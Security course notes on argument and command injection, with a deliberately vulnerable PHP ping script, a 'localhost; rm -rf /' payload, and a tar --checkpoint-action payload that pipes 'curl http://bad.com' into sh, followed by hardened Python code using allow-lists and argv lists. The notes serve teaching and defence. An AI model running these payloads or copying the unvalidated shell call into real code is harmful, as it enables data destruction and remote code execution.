Notes - MCS
Analysis and Exploration of Vulnerabilities

Argument Exploitation

The application runs an external program as part of its normal operation.

  • Example: create a backup of a database to a compressed file.

A crafted payload may get user-controlled commands executed before or after the expected program, or change what that program does, by exploiting the arguments the tool accepts.

  • The intended program will mostly still execute.

  • But other programs may be called as well.

Examples

1.

<?php
    // Vulnerable by design (the example in the notes): the POST value is
    // concatenated into a shell command string without any validation.
    $host = $_POST["hostname"];
    $command = 'ping -c 3 ' . $host;   // trailing space so the host is a separate word
    system($command);
?>

The developer expects an IP address or hostname.

  • But doesn't do any kind of validation.

A custom payload can inject commands: hostname=localhost; rm -rf /

  • The shell sees 2 commands: ping -c 3 localhost; rm -rf /

2.

The application asks the user for the name of the backup file and backs up a home directory:

tar -jcf user_backup_name.tar.bz2 /home/user

A user provides the following name:

.tar.bz2 --checkpoint=1 --checkpoint-action=exec='curl http://bad.com|sh' /etc/issue; #

which results in the following command:

tar -jcf user_.tar.bz2 --checkpoint=1 --checkpoint-action=exec='curl http://bad.com|sh' /etc/issue; # /home/user

Because the name is spliced into a shell command line, the shell splits it into separate words: the --checkpoint options become tar arguments, /etc/issue becomes the file to archive, the ; ends the tar command, and the # turns the rest of the line (including /home/user) into a comment.

tar

The tar tool creates (optionally compressed) archives from files, folders, and generic data.

Because archiving can take a long time, tar supports checkpoints at which actions are executed, usually to notify the user of progress.

With --checkpoint=NUMBER, every NUMBERth record written triggers the checkpoint action; --checkpoint=1 therefore fires on the very first record.

Here the checkpoint action is exec=..., which runs a shell command that will:

  • Get a file from http://bad.com

  • Pipe it into sh, executing it as a bash/sh script
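As an added example (not from these notes), here is a hardened counterpart to both commands above, written in Python. The allow-list patterns, the helper names and the use of subprocess argv lists are assumptions of this example, not anything the notes prescribe. What it demonstrates is that once the user value is validated and handed to the program as a single argv element with no shell in between, neither the ; of the ping example nor the --checkpoint-action of the tar example can change what runs.

```python
"""Hardened versions of the two commands in the notes (added example, not the
notes' own code). Allow-lists, names and the subprocess argv approach are this
example's assumptions."""
from __future__ import annotations

import re
import subprocess

# Allow-lists (assumed policy for this example): a hostname/IP may only contain
# letters, digits, dots and dashes and must not start with a dash; a backup
# name is a short token that also cannot start with '-' or '.'.
HOST_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252}[A-Za-z0-9])?$")
BACKUP_NAME_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]{0,63}$")

# Option-looking tokens or shell metacharacters in a value that should be a
# plain name or host; useful as a log/alert signal before rejecting the input.
SUSPICIOUS_RE = re.compile(r"(?:^|\s)-{1,2}[A-Za-z]|[;|&`$<>\n]")


def vulnerable_ping_command(host: str) -> str:
    """The string the PHP snippet in the notes builds: one shell command line.
    Shown only for contrast; a '; ' inside host becomes a second command."""
    return "ping -c 3 " + host


def safe_host(host: str) -> bool:
    return HOST_RE.fullmatch(host) is not None


def safe_backup_name(name: str) -> bool:
    return BACKUP_NAME_RE.fullmatch(name) is not None


def looks_like_argument_injection(value: str) -> bool:
    return SUSPICIOUS_RE.search(value) is not None


def ping_argv(host: str) -> list[str]:
    """Validate, then build argv. The host is exactly one argv element and no
    shell parses it, so 'localhost; id' can never become a second command."""
    if not safe_host(host):
        raise ValueError(f"rejected host: {host!r}")
    return ["ping", "-c", "3", host]


def backup_argv(name: str, home: str = "/home/user") -> list[str]:
    """Validate the backup name, then build the tar argv. The archive name is
    one argv element, so '--checkpoint=1 --checkpoint-action=...' inside it
    would be part of a file name, not options; '--' ends option parsing
    before the path argument as an extra guard."""
    if not safe_backup_name(name):
        raise ValueError(f"rejected backup name: {name!r}")
    return ["tar", "-jcf", f"user_{name}.tar.bz2", "--", home]


def run(argv: list[str]) -> subprocess.CompletedProcess[str]:
    # shell=False (the default) is what makes the argv boundary real: no word
    # splitting, no ';', no '#', no '|'.
    return subprocess.run(argv, shell=False, capture_output=True, text=True, check=False)


if __name__ == "__main__":
    # The payload from the notes' tar example (constructed input, never executed here).
    payload = ".tar.bz2 --checkpoint=1 --checkpoint-action=exec='curl http://bad.com|sh' /etc/issue; #"
    print("suspicious:", looks_like_argument_injection(payload))
    try:
        backup_argv(payload)
    except ValueError as err:
        print("rejected:", err)
    print("accepted:", backup_argv("monday"))
```

The two defences are independent and both worth having: the allow-list rejects anything that is not a plausible host or file name (and is the place to log suspicious values), while the argv list removes the shell entirely so that word splitting, ; and # never happen. If a shell string is unavoidable, the PHP equivalent of the argv boundary is to quote every user value with escapeshellarg() and to place -- before positional arguments, so that a value beginning with - cannot be read as an option.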
